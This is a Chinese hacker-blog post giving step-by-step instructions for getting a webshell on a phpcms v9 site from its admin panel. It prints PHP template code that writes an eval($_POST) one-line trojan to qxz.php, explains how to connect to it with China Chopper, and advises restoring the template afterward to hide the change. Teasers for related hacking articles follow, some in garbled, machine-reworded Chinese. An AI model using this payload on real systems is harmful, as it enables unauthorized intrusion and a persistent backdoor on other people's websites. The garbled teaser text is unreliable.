记一次phpcms v9后台拿shell过程

hacker4年前黑客文章706

记一次phpcms v9后台拿shell过程

登录进入后台管理后,点击界面,模板风格,然后点击祥细列表,如下图:

phpcmsV9

然后点击 search 这个文件夹,如下图:

phpcms

然后点击修改 index.html 文件

然后把以下代码复制上去提交。

<?

$fp = @fopen(“qxz.php”, ‘a’);

@fwrite($fp, ‘<’.'?php’.”\r\n\r\n”.’eval($_POST[hacker])’.”\r\n\r\n?”.”>\r\n”);

@fclose($fp);

?>

提示:修改前先把原来的代码备份一下,拿到shell后把他改回去。

1259

提交后点击可视化一下

131117163330

这样在网站的根目录就生成了你的一句话木马客户端 qxz.php

拿起菜刀链接 http://www.xxx.com/qxz.php

0131117164105

 

标签: 黑客技术

相关文章

怎么使用nmap绕开这种服务器防火墙的限定开展端口号服务项目

如今许多的网络技术应用都被服务器防火墙维护着,那大家平常在开展扫描仪的情况下,通常一无所获,因而我们在应对服务器防火墙/IDS/IPS的安全防护运用时,该怎么使用nmap绕开这种服务器防火墙的限定开...

专用工具完全免费使用方法

专用工具完全免费使用方法

什么叫Snort? Snort是由Martin Roesch建立的开源系统互联网入侵防御系统系统软件(NIDS)和互联网侵入防护系统(NIPS)。自2014年至今,Snort已由思科交换机全部。Sn...

OSSIM是完全免费的吗?

OSSIM是完全免费的吗?

什么叫OSSIM? OSSIM出示安全性专业人员从SIEM商品中出示的全部作用 - 恶性事件搜集,归一化和关联性。OSSIM是由注安师建立和发布的,不但必须掌握,并且掌握到很多安全性专业人员遭遇的实...

百度快照是如何被黑客篡改的

百度快照是如何被黑客篡改的

写本篇文章的目的在于揭露一种黑客作弊的手段,也给那些疏于企业网站安全的站长提一个醒。同时提供一种追找黑客行踪的简单方法。 前几日,我的客户电话说自己的百度排名没有了,查询下竟然...

discuz! x2.5爆路径漏洞及后台拿shell

爆路径文件如下: /uc_server/control/admin/db.php /source/plugin/myrepeats/table/table_myrepeats.php /in...

DirBuster是什么?

DirBuster是什么?

DirBuster是什么? DirBuster的关键目地是找寻掩藏的文件目录和Web服务端网页页面。房地产商有时候会离去贴近但未连接的网页页面;这一专用工具来发觉这种潜在性的系统漏洞。这是一个jav...